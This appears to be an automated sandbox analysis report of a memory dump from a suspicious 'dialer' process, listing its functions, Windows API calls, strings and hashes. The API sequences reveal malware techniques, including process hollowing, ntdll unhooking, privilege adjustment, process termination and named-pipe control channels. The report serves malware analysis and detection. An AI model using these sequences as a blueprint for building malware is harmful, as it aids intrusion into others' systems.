Memory Dump Source

Source File: 00000016.00000002.1872166289.00007FF723DE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF723DE0000, based on PE: true

Associated: 00000016.00000002.1872105286.00007FF723DE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872243336.00007FF723DE3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872304320.00007FF723DE6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff723de0000_dialer.jbxd

Similarity

API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
String ID:
API String ID: 3197395349-0
Opcode ID: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
Instruction ID: cc45b6075c39a99d542ca1886758643dd0a3ce185827017af69c165061b2a9bc
Opcode Fuzzy Hash: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
Instruction Fuzzy Hash: C9419032614A81CBD794DF64E8407AD7BB4FB44788F80023AEA4D43B98DF78D108CB50

Function 00007FF723DE2CC0 Relevance: 9.1, APIs: 6, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF723DE2CDB
HeapAlloc.KERNEL32 ref: 00007FF723DE2CEF
GetProcessHeap.KERNEL32 ref: 00007FF723DE2CF8
HeapAlloc.KERNEL32 ref: 00007FF723DE2D06
K32EnumProcesses.KERNEL32 ref: 00007FF723DE2D21
SleepEx.KERNELBASE ref: 00007FF723DE2D79

Memory Dump Source

Source File: 00000016.00000002.1872166289.00007FF723DE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF723DE0000, based on PE: true

Associated: 00000016.00000002.1872105286.00007FF723DE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872243336.00007FF723DE3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872304320.00007FF723DE6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff723de0000_dialer.jbxd

Similarity

API ID: Heap$AllocProcess$EnumProcessesSleep
String ID:
API String ID: 3676546796-0
Opcode ID: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
Instruction ID: 805383aac4f1f3474a9661e58be76492a80007ee06a36cec4e37cf16fe3fccbe
Opcode Fuzzy Hash: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
Instruction Fuzzy Hash: A721A735A0868287E35CAB96E85453ABB61FB81B80F504178CB4A17764CF3DE444CF90

Function 00007FF723DE2078 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 128
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCpyW.SHLWAPI ref: 00007FF723DE20AA
StrCatW.SHLWAPI ref: 00007FF723DE20B8
GetModuleHandleW.KERNEL32 ref: 00007FF723DE20C1
GetCurrentProcess.KERNEL32 ref: 00007FF723DE210C
K32GetModuleInformation.KERNEL32 ref: 00007FF723DE2120
CreateFileW.KERNELBASE ref: 00007FF723DE2150
CreateFileMappingW.KERNELBASE ref: 00007FF723DE217B
MapViewOfFile.KERNELBASE ref: 00007FF723DE219F
lstrcmpiA.KERNEL32 ref: 00007FF723DE21EA
VirtualProtect.KERNELBASE ref: 00007FF723DE2221
VirtualProtect.KERNELBASE ref: 00007FF723DE224F
CloseHandle.KERNELBASE ref: 00007FF723DE2258
CloseHandle.KERNEL32 ref: 00007FF723DE2261
FreeLibrary.KERNEL32 ref: 00007FF723DE226A

Strings

C:\Windows\System32\, xrefs: 00007FF723DE209B
.text, xrefs: 00007FF723DE21E3

Memory Dump Source

Source File: 00000016.00000002.1872166289.00007FF723DE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF723DE0000, based on PE: true

Associated: 00000016.00000002.1872105286.00007FF723DE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872243336.00007FF723DE3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872304320.00007FF723DE6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff723de0000_dialer.jbxd

Similarity

API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
String ID: .text$C:\Windows\System32\
API String ID: 2721474350-832442975
Opcode ID: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
Instruction ID: 0c792e8372a3b629d4dce4efebfa6721170c5912b2dd56b860003e9d92fe8c5f
Opcode Fuzzy Hash: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
Instruction Fuzzy Hash: 9F51943670868282EBA9EF55E85467AB760FB84B88F844275CE4D13794DF3CD509CB20

Function 00007FF723DE2D84 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
sleepfilepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF723DE1C64: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF723DE1CB3
Part of subcall function 00007FF723DE1C64: SetEntriesInAclW.ADVAPI32 ref: 00007FF723DE1D14
Part of subcall function 00007FF723DE1C64: LocalAlloc.KERNEL32 ref: 00007FF723DE1D24
Part of subcall function 00007FF723DE1C64: InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF723DE1D3A
Part of subcall function 00007FF723DE1C64: SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF723DE1D52
Part of subcall function 00007FF723DE1C64: CreateNamedPipeW.KERNELBASE ref: 00007FF723DE1D94

Sleep.KERNEL32 ref: 00007FF723DE2DA9
ConnectNamedPipe.KERNELBASE ref: 00007FF723DE2DB6
ReadFile.KERNELBASE ref: 00007FF723DE2DD9
WriteFile.KERNEL32 ref: 00007FF723DE2E07
Sleep.KERNEL32 ref: 00007FF723DE2E14
DisconnectNamedPipe.KERNELBASE ref: 00007FF723DE2E1D

Strings

\\.\pipe\dialerchildproc64, xrefs: 00007FF723DE2D91
M, xrefs: 00007FF723DE2DFA

Memory Dump Source

Source File: 00000016.00000002.1872166289.00007FF723DE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF723DE0000, based on PE: true

Associated: 00000016.00000002.1872105286.00007FF723DE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872243336.00007FF723DE3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872304320.00007FF723DE6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff723de0000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
String ID: M$\\.\pipe\dialerchildproc64
API String ID: 2203880229-3489460547
Opcode ID: 7d22ea23ef86ef8925f3c0e3dc4e470fe94490edd279db0f7d690e2db9d12c90
Instruction ID: 36b4841064e64193d327db2a2af3fcdd10e935dfd17f6aa63b4de6b11ebaf377
Opcode Fuzzy Hash: 7d22ea23ef86ef8925f3c0e3dc4e470fe94490edd279db0f7d690e2db9d12c90
Instruction Fuzzy Hash: 8B1177216186C292E758FF91EC143B9EB60EB44BA0F8443B4D65E526D4CF7CD508CB60

Function 00007FF723DE228C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
sleeppipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF723DE1C64: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF723DE1CB3
Part of subcall function 00007FF723DE1C64: SetEntriesInAclW.ADVAPI32 ref: 00007FF723DE1D14
Part of subcall function 00007FF723DE1C64: LocalAlloc.KERNEL32 ref: 00007FF723DE1D24
Part of subcall function 00007FF723DE1C64: InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF723DE1D3A
Part of subcall function 00007FF723DE1C64: SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF723DE1D52
Part of subcall function 00007FF723DE1C64: CreateNamedPipeW.KERNELBASE ref: 00007FF723DE1D94

Sleep.KERNEL32 ref: 00007FF723DE22B1
ConnectNamedPipe.KERNELBASE ref: 00007FF723DE22BE
ReadFile.KERNEL32 ref: 00007FF723DE22E1
Sleep.KERNEL32 ref: 00007FF723DE2302
DisconnectNamedPipe.KERNEL32 ref: 00007FF723DE230B

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 00007FF723DE2299

Memory Dump Source

Source File: 00000016.00000002.1872166289.00007FF723DE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF723DE0000, based on PE: true

Associated: 00000016.00000002.1872105286.00007FF723DE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872243336.00007FF723DE3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872304320.00007FF723DE6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff723de0000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 2071455217-3440882674
Opcode ID: 5695317b32aa55875ab713aa7e4462bbb3149900d195a386a470b0f830d0d176
Instruction ID: 36e78074a1865b830c377b1235a5371b63df463a6a47482e57cf0f55864ab745
Opcode Fuzzy Hash: 5695317b32aa55875ab713aa7e4462bbb3149900d195a386a470b0f830d0d176
Instruction Fuzzy Hash: A8019620A186C682E79CBB91EC04379EB60EF41BA0F8443B8D61E125D0CF7CD508CF20

Function 00007FF723DE17F8 Relevance: 9.1, APIs: 6, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF723DE180D
HeapAlloc.KERNEL32 ref: 00007FF723DE181E

Part of subcall function 00007FF723DE14E4: GetProcessHeap.KERNEL32 ref: 00007FF723DE1517
Part of subcall function 00007FF723DE14E4: HeapAlloc.KERNEL32 ref: 00007FF723DE152A
Part of subcall function 00007FF723DE14E4: GetProcessHeap.KERNEL32 ref: 00007FF723DE1538
Part of subcall function 00007FF723DE14E4: HeapAlloc.KERNEL32 ref: 00007FF723DE1549
Part of subcall function 00007FF723DE14E4: K32EnumProcesses.KERNEL32 ref: 00007FF723DE1563
Part of subcall function 00007FF723DE14E4: OpenProcess.KERNEL32 ref: 00007FF723DE1591
Part of subcall function 00007FF723DE14E4: K32EnumProcessModules.KERNEL32 ref: 00007FF723DE15B6
Part of subcall function 00007FF723DE14E4: ReadProcessMemory.KERNELBASE ref: 00007FF723DE15ED
Part of subcall function 00007FF723DE14E4: CloseHandle.KERNELBASE ref: 00007FF723DE1629
Part of subcall function 00007FF723DE14E4: GetProcessHeap.KERNEL32 ref: 00007FF723DE163B
Part of subcall function 00007FF723DE14E4: HeapFree.KERNEL32 ref: 00007FF723DE1649
Part of subcall function 00007FF723DE14E4: GetProcessHeap.KERNEL32 ref: 00007FF723DE164F
Part of subcall function 00007FF723DE14E4: HeapFree.KERNEL32 ref: 00007FF723DE165D

OpenProcess.KERNEL32 ref: 00007FF723DE1865
TerminateProcess.KERNEL32 ref: 00007FF723DE1878
CloseHandle.KERNEL32 ref: 00007FF723DE1881
GetProcessHeap.KERNEL32 ref: 00007FF723DE1891

Memory Dump Source

Source File: 00000016.00000002.1872166289.00007FF723DE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF723DE0000, based on PE: true

Associated: 00000016.00000002.1872105286.00007FF723DE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872243336.00007FF723DE3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872304320.00007FF723DE6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff723de0000_dialer.jbxd

Similarity

API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
String ID:
API String ID: 1323846700-0
Opcode ID: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
Instruction ID: 60fdbe94d8bdbcba1a53d6565d2fab49daaf44adc8a6b155bed7b5494d6240a9
Opcode Fuzzy Hash: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
Instruction Fuzzy Hash: 9B11B425F0968286FB9CABA6EC40179AFA1FF89B80F888178DD4D17755DE3CD4468B10

Function 00007FF723DE19AC Relevance: 4.5, APIs: 3, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(?,?,?,00007FF723DE110E), ref: 00007FF723DE19CA
IsWow64Process.KERNEL32(?,?,?,00007FF723DE110E), ref: 00007FF723DE19E0
CloseHandle.KERNELBASE(?,?,?,00007FF723DE110E), ref: 00007FF723DE19FB

Memory Dump Source

Source File: 00000016.00000002.1872166289.00007FF723DE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF723DE0000, based on PE: true

Associated: 00000016.00000002.1872105286.00007FF723DE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872243336.00007FF723DE3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872304320.00007FF723DE6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff723de0000_dialer.jbxd

Similarity

API ID: Process$CloseHandleOpenWow64
String ID:
API String ID: 10462204-0
Opcode ID: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
Instruction ID: f29f15a5b0268d810d9b8d04de2bb0b4ee05850bd81b8f347b3d72af4a7a548d
Opcode Fuzzy Hash: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
Instruction Fuzzy Hash: 76F06D21B0878283EB989F56B884139AA60FB88BC0F84817CEA8D53748DF3CD485CB00

Function 00007FF723DE2314 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF723DE2328: VerSetConditionMask.NTDLL ref: 00007FF723DE2397
Part of subcall function 00007FF723DE2328: VerSetConditionMask.NTDLL ref: 00007FF723DE23A8
Part of subcall function 00007FF723DE2328: VerSetConditionMask.NTDLL ref: 00007FF723DE23B9
Part of subcall function 00007FF723DE2328: VerifyVersionInfoW.KERNEL32 ref: 00007FF723DE23CC
Part of subcall function 00007FF723DE2328: GetCurrentProcessId.KERNEL32 ref: 00007FF723DE23DE
Part of subcall function 00007FF723DE2328: OpenProcess.KERNEL32 ref: 00007FF723DE23EE
Part of subcall function 00007FF723DE2328: OpenProcessToken.ADVAPI32 ref: 00007FF723DE240F
Part of subcall function 00007FF723DE2328: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF723DE2429
Part of subcall function 00007FF723DE2328: AdjustTokenPrivileges.KERNELBASE ref: 00007FF723DE246D
Part of subcall function 00007FF723DE2328: GetLastError.KERNEL32 ref: 00007FF723DE2477
Part of subcall function 00007FF723DE2328: CloseHandle.KERNELBASE ref: 00007FF723DE2480
Part of subcall function 00007FF723DE2328: FindResourceExA.KERNEL32 ref: 00007FF723DE2494
Part of subcall function 00007FF723DE2328: SizeofResource.KERNEL32 ref: 00007FF723DE24AB
Part of subcall function 00007FF723DE2328: LoadResource.KERNEL32 ref: 00007FF723DE24C4
Part of subcall function 00007FF723DE2328: LockResource.KERNEL32 ref: 00007FF723DE24D6
Part of subcall function 00007FF723DE2328: GetCurrentProcessId.KERNEL32 ref: 00007FF723DE24E3

ExitProcess.KERNEL32 ref: 00007FF723DE231F

Memory Dump Source

Source File: 00000016.00000002.1872166289.00007FF723DE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF723DE0000, based on PE: true

Associated: 00000016.00000002.1872105286.00007FF723DE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872243336.00007FF723DE3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872304320.00007FF723DE6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff723de0000_dialer.jbxd

Similarity

API ID: Process$Resource$ConditionMask$CurrentOpenToken$AdjustCloseErrorExitFindHandleInfoLastLoadLockLookupPrivilegePrivilegesSizeofValueVerifyVersion
String ID:
API String ID: 2329183550-0
Opcode ID: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
Instruction ID: 61f40bf48cf176bdb6190777628246399ee33dfc9ad23daee1342c3d5bc2ccce
Opcode Fuzzy Hash: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
Instruction Fuzzy Hash: 54A01100E282C282EA8C33F02C0A03C8820AF80302BC00ABCC00A22282CE2CA0080F30

Non-executed Functions

Function 00007FF723DE26E8 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 292
memoryregistryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32 ref: 00007FF723DE276B

Part of subcall function 00007FF723DE19AC: OpenProcess.KERNEL32(?,?,?,00007FF723DE110E), ref: 00007FF723DE19CA
Part of subcall function 00007FF723DE19AC: IsWow64Process.KERNEL32(?,?,?,00007FF723DE110E), ref: 00007FF723DE19E0
Part of subcall function 00007FF723DE19AC: CloseHandle.KERNELBASE(?,?,?,00007FF723DE110E), ref: 00007FF723DE19FB

Part of subcall function 00007FF723DE10C0: OpenProcess.KERNEL32 ref: 00007FF723DE112C
Part of subcall function 00007FF723DE10C0: OpenProcess.KERNEL32 ref: 00007FF723DE114B
Part of subcall function 00007FF723DE10C0: K32GetModuleFileNameExW.KERNEL32 ref: 00007FF723DE1170
Part of subcall function 00007FF723DE10C0: PathFindFileNameW.SHLWAPI ref: 00007FF723DE117E
Part of subcall function 00007FF723DE10C0: lstrlenW.KERNEL32 ref: 00007FF723DE118A
Part of subcall function 00007FF723DE10C0: StrCpyW.SHLWAPI ref: 00007FF723DE11A1
Part of subcall function 00007FF723DE10C0: CloseHandle.KERNEL32 ref: 00007FF723DE11AD
Part of subcall function 00007FF723DE10C0: StrCmpIW.SHLWAPI ref: 00007FF723DE11ED
Part of subcall function 00007FF723DE10C0: NtQueryInformationProcess.NTDLL ref: 00007FF723DE1221
Part of subcall function 00007FF723DE10C0: OpenProcessToken.ADVAPI32 ref: 00007FF723DE124B

RegOpenKeyExW.ADVAPI32 ref: 00007FF723DE2807
RegDeleteValueW.ADVAPI32 ref: 00007FF723DE281F
ExitProcess.KERNEL32 ref: 00007FF723DE2843
GetProcessHeap.KERNEL32 ref: 00007FF723DE284A
HeapAlloc.KERNEL32 ref: 00007FF723DE285D
K32EnumProcesses.KERNEL32 ref: 00007FF723DE287A
ExitProcess.KERNEL32 ref: 00007FF723DE291A

Strings

SOFTWARE, xrefs: 00007FF723DE27F9
dialerstager, xrefs: 00007FF723DE2818
open, xrefs: 00007FF723DE2AEC

Memory Dump Source

Source File: 00000016.00000002.1872166289.00007FF723DE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF723DE0000, based on PE: true

Associated: 00000016.00000002.1872105286.00007FF723DE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872243336.00007FF723DE3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872304320.00007FF723DE6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff723de0000_dialer.jbxd

Similarity

API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
String ID: SOFTWARE$dialerstager$open
API String ID: 3276259517-3931493855
Opcode ID: 57deca5b7dadaa8d94473ef24676dfbe4cb0f61227f20ab4b3d1e5920c79bf4c
Instruction ID: adfff68be6198873eb6dcfec5111a1929ab9431b91c1bbdf120686e1e00684ce
Opcode Fuzzy Hash: 57deca5b7dadaa8d94473ef24676dfbe4cb0f61227f20ab4b3d1e5920c79bf4c
Instruction Fuzzy Hash: B1D19121A186C286E7BDBFA5DC007F8AA65FF40744F8042B5E90D67694DF7CE609CB20

Function 00007FF723DE1DB4 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162
injectionthreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32 ref: 00007FF723DE1E78
VirtualAllocEx.KERNEL32 ref: 00007FF723DE1EA7
WriteProcessMemory.KERNEL32 ref: 00007FF723DE1ECC
WriteProcessMemory.KERNEL32 ref: 00007FF723DE1F08
VirtualAlloc.KERNEL32 ref: 00007FF723DE1F3B
GetThreadContext.KERNEL32 ref: 00007FF723DE1F57
WriteProcessMemory.KERNEL32 ref: 00007FF723DE1F7F
SetThreadContext.KERNEL32 ref: 00007FF723DE1F9D
ResumeThread.KERNEL32 ref: 00007FF723DE1FAD
OpenProcess.KERNEL32 ref: 00007FF723DE1FCC
TerminateProcess.KERNEL32 ref: 00007FF723DE1FDC

Strings

@, xrefs: 00007FF723DE1E9F

Memory Dump Source

Source File: 00000016.00000002.1872166289.00007FF723DE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF723DE0000, based on PE: true

Associated: 00000016.00000002.1872105286.00007FF723DE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872243336.00007FF723DE3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872304320.00007FF723DE6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff723de0000_dialer.jbxd

Similarity

API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
String ID: @
API String ID: 3462610200-2766056989
Opcode ID: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
Instruction ID: a9d0fb62b91ea1b5cc6df258cc7049c09aae767dcd420c772ad7ded23d16f3c6
Opcode Fuzzy Hash: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
Instruction Fuzzy Hash: 3D61B432B04A8186E798DF66D8407ADBBA1FB48B88F804279DE4D67758DF38D446CB50

Function 00007FF723DE1AC4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106memorycomCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF723DE1AEB
SysAllocString.OLEAUT32 ref: 00007FF723DE1AFB
CoInitializeEx.OLE32 ref: 00007FF723DE1B08
CoInitializeSecurity.OLE32 ref: 00007FF723DE1B3F
CoCreateInstance.OLE32 ref: 00007FF723DE1B84
VariantInit.OLEAUT32 ref: 00007FF723DE1B96
CoUninitialize.OLE32 ref: 00007FF723DE1C2F
SysFreeString.OLEAUT32 ref: 00007FF723DE1C38
SysFreeString.OLEAUT32 ref: 00007FF723DE1C41

Strings

dialersvc64, xrefs: 00007FF723DE1AE2

Memory Dump Source

Source File: 00000016.00000002.1872166289.00007FF723DE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF723DE0000, based on PE: true

Associated: 00000016.00000002.1872105286.00007FF723DE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872243336.00007FF723DE3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872304320.00007FF723DE6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff723de0000_dialer.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID: dialersvc64
API String ID: 4184240511-3881820561
Opcode ID: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
Instruction ID: b065e0b48675ac25eb48885c63a2adb5b120a1281d00d3a5d20b547bf46b7b48
Opcode Fuzzy Hash: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
Instruction Fuzzy Hash: C1419C32B04B8286E7549F65E8442ADB7B1FB89B88B844275EE4E57A24DF38D149C710

Function 00007FF723DE1000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF723DE1034
RegDeleteKeyW.ADVAPI32 ref: 00007FF723DE1045
RegEnumKeyExW.ADVAPI32 ref: 00007FF723DE1082
RegCloseKey.ADVAPI32 ref: 00007FF723DE1093
RegDeleteKeyExW.ADVAPI32 ref: 00007FF723DE10B0

Strings

SOFTWARE\dialerconfig, xrefs: 00007FF723DE1026, 00007FF723DE109C

Memory Dump Source

Source File: 00000016.00000002.1872166289.00007FF723DE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF723DE0000, based on PE: true

Associated: 00000016.00000002.1872105286.00007FF723DE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872243336.00007FF723DE3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872304320.00007FF723DE6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff723de0000_dialer.jbxd

Similarity

API ID: Delete$CloseEnumOpen
String ID: SOFTWARE\dialerconfig
API String ID: 3013565938-461861421
Opcode ID: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
Instruction ID: 5cfba645e0ecd8ddb9110cb95067a39c6722dfbcb7cb5eebad74c26c3fd97d24
Opcode Fuzzy Hash: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
Instruction Fuzzy Hash: F211E722B18AC482E7B49F61EC447B9A764FB48759FC00375D64D1A998CF3CD218CF24

Function 00007FF723DE2C18 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF723DE2C53
WriteFile.KERNEL32 ref: 00007FF723DE2C7B
WriteFile.KERNEL32 ref: 00007FF723DE2C9E
CloseHandle.KERNEL32 ref: 00007FF723DE2CA7

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 00007FF723DE2C30

Memory Dump Source

Source File: 00000016.00000002.1872166289.00007FF723DE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF723DE0000, based on PE: true

Associated: 00000016.00000002.1872105286.00007FF723DE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872243336.00007FF723DE3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872304320.00007FF723DE6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff723de0000_dialer.jbxd

Similarity

API ID: File$Write$CloseCreateHandle
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 148219782-3440882674
Opcode ID: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
Instruction ID: 587e16a19dc6ec41fa9b18dada20df1ee24c9b6a8b08b520a873fd657c65988a
Opcode Fuzzy Hash: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
Instruction Fuzzy Hash: 33119E76A24B9083E758AB55E808329AB60FB88BA4F844375EA5903B94CF7CD509CB50

Function 00007FF723DE1A14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,00007FF723DE1914), ref: 00007FF723DE1A24
GetProcAddress.KERNEL32(?,?,00000000,00007FF723DE1914), ref: 00007FF723DE1A37

Strings

ntdll.dll, xrefs: 00007FF723DE1A1A

Memory Dump Source

Source File: 00000016.00000002.1872166289.00007FF723DE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF723DE0000, based on PE: true

Associated: 00000016.00000002.1872105286.00007FF723DE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872243336.00007FF723DE3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872304320.00007FF723DE6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff723de0000_dialer.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ntdll.dll
API String ID: 1646373207-2227199552
Opcode ID: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
Instruction ID: cb54d27c0f0debc713f8cd59e2dfa1f0e50c7caa4c00c95f1bd248983fbce6ed
Opcode Fuzzy Hash: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
Instruction Fuzzy Hash: F1D0A998F1668383EF8DABE2AC550708610EF08B80BC802B4CC1E16300DF2CD09A8A20

Analysis Process: powershell.exePID: 2924, Parent PID: 3968COMMON

Executed Functions

Function 00007FF7C0DC361A Relevance: .5, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

